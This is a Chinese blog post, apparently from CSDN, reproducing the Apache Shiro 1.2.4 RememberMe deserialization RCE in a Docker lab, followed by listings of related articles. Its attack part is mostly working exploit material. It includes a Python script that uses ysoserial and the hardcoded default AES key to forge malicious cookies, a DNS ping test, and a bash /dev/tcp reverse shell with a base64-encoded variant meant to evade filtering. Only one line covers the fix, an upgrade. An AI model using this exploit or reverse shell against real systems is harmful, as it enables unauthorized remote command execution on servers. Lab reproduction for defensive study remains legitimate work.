Shiro RememberMe 1.2.4 反序列化漏洞复现

最新推荐文章于 2024-08-07 19:26:08 发布
最新推荐文章于 2024-08-07 19:26:08 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/105659797
版权

漏洞分析

Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞

环境搭建

使用docker复现漏洞环境

docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

访问80端口
在这里插入图片描述

工具准备

反序列化工具ysoserial,下载后将其命名为ysoserial-0.0.8-SNAPSHOT-all.jar
生成payloadcookie的脚本,命名为shiro.py

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    #popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollectionsK1TomcatEcho', 'a'], stdout=subprocess.PIPE)   #tomcat回显
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA==" #默认key
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw

漏洞复现

一、ping包回显
1、在终端中执行脚本,生成所需cookie,比如

python3 shiro.py "ping btiwap.ceye.io"

2、登录漏洞环境,点击account page抓包,并替换cookie
在这里插入图片描述
3、登录CEYE平台,可查看到DNS解析记录
在这里插入图片描述
二、反弹shell
监听机器IP:192.168.10.10
反弹shell命令:bash -i >& /dev/tcp/192.168.10.10/7777 0>&1
需经过base64编码绕过:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
使用脚本生成cookie:

python3 shiro.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"

同样进行抓包替换cookie,放包后可以在监听机器192.168.10.10上收到shell
在这里插入图片描述

漏洞修复

升级 Shiro 版本至 1.2.5 以上

参考文章

https://www.cnblogs.com/paperpen/p/11312671.html
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x04

Franchi小白帽
关注
专栏目录
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1561
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞复现
DXfighting_的博客
04-15 1693
下载使用反序列化利用工具ysoserial 项目地址:https://github.com/frohoff/ysoserial 适用maven在命令行下打包: mvn clean package -DskipTests(在项目目录下执行) 使用ysoserial生成CommonsBeanutils1的Gadget: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" &...
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击,例如SHIRO-550。 0x01重现此问题的步骤: 登录网站,并从cookie中获取RememberMe。 使用RememberMe cookie作为填充Oracle Attack的前缀。 加密ysoserial的序列化有效负载,以通过填充Oracle Attack制作精心制作的RememberMe。 请求带有新的RememberMe cookie的网站,以执行反序列化攻击。 攻击者无需知道RememberMe加密的密码密钥。
Apache Shiro remember Me反序列化漏洞Shiro 550)复现
一位热爱网安的年轻人的博客
01-11 1107
Apache Shiro remember Me反序列化漏洞Shiro 550)复现
Shiro rememberMe反序列化漏洞(Shiro-550)
最新发布
2201_75891821的博客
08-07 230
Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功 能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。
Shiro RememberMe反序列化漏洞复现Shiro-550)
box
11-28 5096
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 : 序列化 =>AES加密 =>Base64编码操作 在识别身份
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1288
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
Shiro rememberMe反序列化漏洞(Shiro-550)复现
m0_67401660的博客
04-07 1259
欢迎到我的博客查看原文:http://www.xpshuai.cn/posts/40239/ 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过.
漏洞复现Shiro 反序列化漏洞
2301_80115097的博客
11-08 2204
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
ysoserial-0.0.6-SNAPSHOT-all.jar
04-22
ysoserial-0.0.6-SNAPSHOT-all.jar,github很难下载到了。仅限于测试自己代码安全性。
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口,生成一个域名,进行检测后,结果会输出在结果区域。 选择该选项时, dnslog.cn卡顿,正在从dnslog.cn获取dnslog.cn ,并显示。 自定义DNSLOG 需要自己输入一个dnslog地址,进行检测后去输入的dnslog平台去查看结果 使用URLDNS 利用URLDNS进行检测。 参考: : 使用有效载荷 通过执行ping命令来检测。 使用XCheck 通过使用SimplePrincipalCollection序列化来进行检测,key正
漏洞复现】最简洁的Shiro RememberMe 1.2.4 反序列化命令执行漏洞
T_Snail_T的博客
04-03 4424
0x00 前言 最近在内网进行测试,朋友跟我说在内网这种漏洞比较多,记得这个漏洞是很久之前就爆出来了,当时只是看了一下复现文档,没有进行实操,正好这次复现了,在这里记录一下,而且我这里使用的办法比网上大部分文章都相对简洁,很适合跟我一样的小白复现。 0x01 服务器环境安装 直接使用docker进行环境的安装 docker pull medicean/vulapps:s_shiro_1 安装好...
shiro1.2.4漏洞复现
weixin_44248882的博客
05-22 337
shiro 1.2.4漏洞复现 Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 漏洞环境
漏洞分析 | 经典的Shiro反序列化
2301_80115097的博客
03-26 1765
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
Shiro框架漏洞分析与复现
m0_59598029的博客
04-18 1782
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值